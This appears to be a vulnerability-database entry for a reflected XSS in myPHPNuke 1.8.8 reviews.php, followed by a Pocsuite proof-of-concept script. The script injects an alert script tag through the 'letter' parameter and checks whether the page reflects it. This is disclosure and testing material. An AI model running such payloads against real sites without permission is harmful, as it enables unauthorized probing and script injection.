myPHPNuke 1.8.8 reviews.php letter Parameter XSS

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Vulnerability in myPHPNuke 1.8.8 reviews.php allows XSS through the letter parameter.


                                                #!/usr/bin/env python
# coding: utf-8
from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '80921'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = '2006-02-28'
    createDate = '2015-11-21'
    updateDate = '2015-11-21'
    references = ['http://www.sebug.net/vuldb/ssvid-80921']
    name = 'myPHPNuke 1.8.8 reviews.php letter Parameter XSS'
    appPowerLink = 'http://sourceforge.net/projects/myphpnuke/'
    appName = 'myPHPNuke'
    appVersion = '1.8.8'
    vulType = 'Other'
    desc = '''
    myPHPNuke 1.8.8 reviews.php letter Parameter XSS
    
    '''
    samples = ['']

    def _verify(self):
        return  self._verify_xss()


    def _verify_xss(self):
        payload = "reviews.php?op=reviews&letter=<script>alert(/sebug/)</script>"
        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload, 'xss')
    
    def parse_verify(self, res, payload, type):
        output = Output(self)
        result = {}

        if  type == 'xss' and '<script>alert(/sebug/)</script>' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):
     
        return self._verify()


register(TestPOC)

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1